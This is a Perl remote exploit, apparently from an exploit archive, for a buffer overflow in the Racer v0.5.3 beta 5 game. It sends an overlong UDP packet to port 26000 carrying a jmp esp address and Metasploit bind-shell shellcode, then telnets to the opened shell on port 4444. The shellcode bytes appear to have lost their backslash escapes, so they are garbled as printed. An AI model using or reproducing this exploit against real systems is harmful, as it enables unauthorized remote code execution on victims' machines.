Home / os / blackberry
racer-overflow.txt
Posted on 14 August 2007
#!/usr/bin/perl ###Credit's to n00b. ################################################ #Racer v0.5.3 beta 5 (12-03-07) remote exploit. #Racer is also prone to a buffer over flow in the #server and client.Automatically the game open's #Udp port 26000 and is waiting for a msg buffer. #If we send an overly long buffer we are able to #Control the eip register and esp hold's enough #buffer to have a good size shell code. ############################################### #Tested: Win Xp sp2 English #Vendor's web site: http://www.racer.nl/ #Affected version's: all version's. #Tested on: Racer v0.5.3 beta 5 (12-03-07). #Special thank's to str0ke. ########################### print <<End; ***************************************************** Racer v0.5.3 beta 5 (12-03-07) remote exploit ===================================================== Credit's to n00b for finding this bug and writing the exploit.This exploit work's for the client and the server. ***************************************************** Disclaimer ---------- The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Educational use only..!! ***************************************************** Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo Luigi Auriemma. ***************************************************** (*)Please wait End sleep 8; system("cls"); use IO::Socket; $ip = $ARGV[0]; $payload1 = "A"x1001; #jmp esp 0x77D8AF0A user32.dll english $jmpcode = "x0AxAFxD8x77"; #win32_bind -EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 #http://metasploit.com */. $shellcode = "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49". "x49x48x49x49x49x49x49x49x49x49x49x49x51x5ax6ax67". "x58x30x41x31x50x42x41x6bx42x41x77x32x42x42x42x32". "x41x41x30x41x41x58x38x42x42x50x75x5ax49x49x6cx72". "x4ax48x6bx32x6dx48x68x4cx39x39x6fx39x6fx69x6fx43". "x50x6ex6bx50x6cx66x44x41x34x4cx4bx73x75x47x4cx6c". "x4bx43x4cx57x75x30x78x75x51x7ax4fx4cx4bx42x6fx34". "x58x4ex6bx41x4fx37x50x46x61x7ax4bx42x69x4ex6bx46". "x54x6cx4bx63x31x6ax4ex50x31x49x50x4cx59x6ex4cx6f". "x74x49x50x32x54x74x47x6fx31x6bx7ax44x4dx46x61x6f". "x32x4ax4bx4ax54x77x4bx31x44x51x34x55x78x31x65x4b". "x55x6cx4bx33x6fx75x74x63x31x38x6bx35x36x4ex6bx44". "x4cx70x4bx4ex6bx43x6fx55x4cx36x61x78x6bx36x63x66". "x4cx4ex6bx6fx79x42x4cx31x34x57x6cx75x31x78x43x75". "x61x39x4bx50x64x4cx4bx57x33x34x70x4cx4bx77x30x64". "x4cx4cx4bx70x70x37x6cx4cx6dx6ex6bx61x50x74x48x31". "x4ex30x68x6cx4ex62x6ex44x4ex78x6cx72x70x39x6fx79". "x46x63x56x76x33x70x66x42x48x56x53x37x42x53x58x62". "x57x41x63x54x72x63x6fx51x44x59x6fx5ax70x50x68x7a". "x6bx6ax4dx4bx4cx47x4bx62x70x59x6fx6ex36x71x4fx6f". "x79x4dx35x43x56x6bx31x4ax4dx33x38x34x42x31x45x52". "x4ax55x52x79x6fx6ex30x73x58x6ax79x77x79x4cx35x4c". "x6dx52x77x39x6fx69x46x72x73x71x43x61x43x41x43x30". "x53x42x63x46x33x42x63x71x43x4bx4fx58x50x71x76x30". "x68x32x31x71x4cx65x36x41x43x6bx39x58x61x6ax35x63". "x58x59x34x76x7ax30x70x4bx77x61x47x49x6fx4ax76x71". "x7ax42x30x53x61x41x45x6bx4fx5ax70x53x58x6ex44x6c". "x6dx64x6ex6dx39x36x37x49x6fx4bx66x73x63x30x55x39". "x6fx4ex30x52x48x4dx35x41x59x6fx76x32x69x70x57x49". "x6fx4ex36x66x30x66x34x30x54x43x65x4bx4fx4ax70x4f". "x63x63x58x39x77x50x79x68x46x64x39x36x37x39x6fx4e". "x36x70x55x4bx4fx6ex30x63x56x31x7ax32x44x42x46x31". "x78x33x53x72x4dx4dx59x78x65x50x6ax52x70x70x59x57". "x59x38x4cx6bx39x5ax47x31x7ax72x64x4ex69x4bx52x70". "x31x49x50x78x73x4ex4ax4bx4ex71x52x56x4dx6bx4ex72". "x62x34x6cx4fx63x6ex6dx33x4ax77x48x4ex4bx6cx6bx4c". "x6bx55x38x32x52x6bx4ex58x33x56x76x59x6fx70x75x43". "x74x49x6fx7ax76x43x6bx36x37x70x52x36x31x31x41x31". "x41x52x4ax54x41x70x51x51x41x50x55x63x61x6bx4fx58". "x50x73x58x4cx6dx79x49x43x35x4ax6ex31x43x4bx4fx7a". "x76x71x7ax59x6fx4bx4fx64x77x6bx4fx38x50x4cx4bx50". "x57x79x6cx4cx43x5ax64x70x64x4bx4fx4ex36x33x62x79". "x6fx6ex30x41x78x4cx30x6fx7ax43x34x51x4fx50x53x79". "x6fx4ax76x4bx4fx4ex30x67"; $payload2 = "B"x500; if(!$ip) { die "remember the ip "; } $port = '26000'; $protocol = 'udp'; $socket = IO::Socket::INET->new(PeerAddr=>$ip, PeerPort=>$port, Proto=>$protocol, Timeout=>'1') || die "Make sure service is running on the port "; { print $socket $payload1,$jmpcode,$shellcode,$payload2,; print "[+]Sending malicious payload. "; sleep 2; system("cls"); print "[+]Done !!. "; close($socket); { sleep 5; print " + Connecting on port 4444 of $host ... "; system("telnet $ip 4444"); close($socket); } } #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #Microsoft Windows XP [Version 5.1.2600] #(C) Copyright 1985-2001 Microsoft Corp. # C:Documents and Settings****Desktop acer053b5> #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~